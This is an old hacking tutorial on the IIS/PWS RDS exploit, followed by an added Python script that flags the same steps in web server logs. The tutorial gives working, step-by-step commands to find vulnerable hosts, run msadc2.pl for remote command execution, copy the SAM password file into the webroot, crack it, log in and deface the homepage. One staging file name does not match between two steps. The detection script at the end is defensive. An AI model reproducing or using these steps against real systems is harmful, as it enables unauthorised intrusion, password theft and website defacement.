Hacking IIS/PWS - the RDS Exploit
by r00tsec of Security Espionage Community
May
For Windoze9x/2k/nt users.

Note: This text is based on the discoveries by RFP!

FIND A SERVER RUNNING IIS OR PWS:

To do that do one of the following things:
a) Go to www.netcraft.com
b) Search for common IIS files via www.altavista.com, eg: link:/showcode.asp or url:/msadc/ or url:/iishelp

When you have found a server, type the following in your browser:
www.server.com/index.ida
and the server will more than gladly tell you (90% of the time) the default publication dir of the web service.
c:\inetpub\wwwroot\ <- default dir

Now download msadc2.pl or msadc.pl from http://sec.subnet.dk in the Programs Section. Also download the ActivePerl interpreter for Windows from www.activestate.com and install it.

Now from command.com or cmd.exe run:
perl -x c:\msadc2.pl -h www.server.com

It'll probably spit something like this out (if you are lucky):
cmd /c
then type the command you wish, e.g.:
copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\error.fil

In your browser type:
www.server.com/temp.fil
Tada, you have now got your fingers on the NT hashed password file. To extract that file, type (at cmd/command):
extract temp.fil whatever.file

Now run L0phtcrack from www.l0pht.com/l0phtcrack or similar to crack whatever.file.

When you've cracked whatever.file, edit lmhosts.sam (your own) with the following:
www.server.com
Note: lmhosts.sam is located in \winnt\system32\drivers\etc and in \windows\config\ (if I recall?)

Now go to Start|Find|Computer and type:
www.server.com
Click the icon and type in username and password! muhahaha
Access probably granted.

TO HACK THA HOMEPAGE:

On www.server.com find the default homepage by typing www.server.com (in your browser) and one of the following: index.htm, index.html, index.asp, default.htm, default.html or default.asp and so on.
Then run (from console):
perl -x c:\msadc2.pl -h www.server.com
cmd/c: echo This site has been defaced by m3 4nd 1'm 2 c00l..bl4..bl4... > c:\inetpub\wwwroot\default.htm

In your browser it will look like:
This site has been defaced by m3 4nd 1'm 2 c00l..bl4..bl4...

There are many other ways to hack www.server.com via the RDS exploit, but I'll leave those for your imagination.

- If you want to add something to this paper or know some kung fu style techniques using the RDS exploit, let me know -> r00tsec@hushmail.com!

Call that a good day and stay put for more stunning papers! Let me know if it worked for you, or if you have any suggestions for other RDS script kiddie methods, or if the paper just sucks!
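Every step in the text above (the index.ida probe, the requests under /msadc/, the fetch of the staged .fil copy) shows up in the web server's own log, and the following is an added example, not part of the original text, that flags those requests in IIS W3C extended log lines and ranks clients by how many distinct stages they hit. The log excerpt, addresses and times are constructed; the sample assumes /msadc/msadcs.dll as the RDS request handler and /msadc/Samples/SELECTOR/showcode.asp as the location of the sample script the text searches for.

```python
# Constructed IIS 4 W3C extended log excerpt (made-up addresses and times).
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
1999-05-01 10:00:01 192.0.2.10 GET /index.htm - 200
1999-05-01 10:00:05 192.0.2.77 GET /index.ida - 500
1999-05-01 10:00:07 192.0.2.77 GET /msadc/ - 403
1999-05-01 10:00:09 192.0.2.77 GET /msadc/Samples/SELECTOR/showcode.asp - 200
1999-05-01 10:00:12 192.0.2.77 POST /msadc/msadcs.dll - 200
1999-05-01 10:00:30 192.0.2.77 GET /error.fil - 200
1999-05-01 10:01:00 192.0.2.10 GET /default.asp - 200
"""
# Rule name -> test on the lower-cased cs-uri-stem. Paths come from the text:
# the /msadc/ RDS directory, the .ida path-disclosure trick, showcode.asp,
# and the .fil staging name the text uses for the copied SAM (tune to taste).
RULES = {
    "rds-endpoint": lambda u: u.startswith("/msadc/"),
    "ida-path-probe": lambda u: u.endswith(".ida"),
    "sample-script": lambda u: u.endswith("/showcode.asp"),
    "staged-file": lambda u: u.endswith(".fil"),
}

def parse_w3c(text):
    """Parse W3C extended log lines, taking column names from the #Fields: header."""
    fields = []
    records = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            records.append(dict(zip(fields, line.split())))
    return records

def detect(records):
    """Return (client ip, rule, uri) for every rule a request matches."""
    alerts = []
    for r in records:
        uri = r["cs-uri-stem"].lower()
        for name, match in RULES.items():
            if match(uri):
                alerts.append((r["c-ip"], name, r["cs-uri-stem"]))
    return alerts

def rules_per_client(alerts):
    """Distinct rules per address: probe, RDS call and fetch from one client is the sequence above."""
    seen = {}
    for ip, name, _ in alerts:
        seen.setdefault(ip, set()).add(name)
    return seen

if __name__ == "__main__":
    print(rules_per_client(detect(parse_w3c(SAMPLE_LOG))))
```

A single hit on one rule is noise (sample scripts get crawled); one address touching three or four stages in a short window is the pattern worth paging on, and removing the /msadc/ virtual directory and the sample scripts removes the endpoints the text relies on.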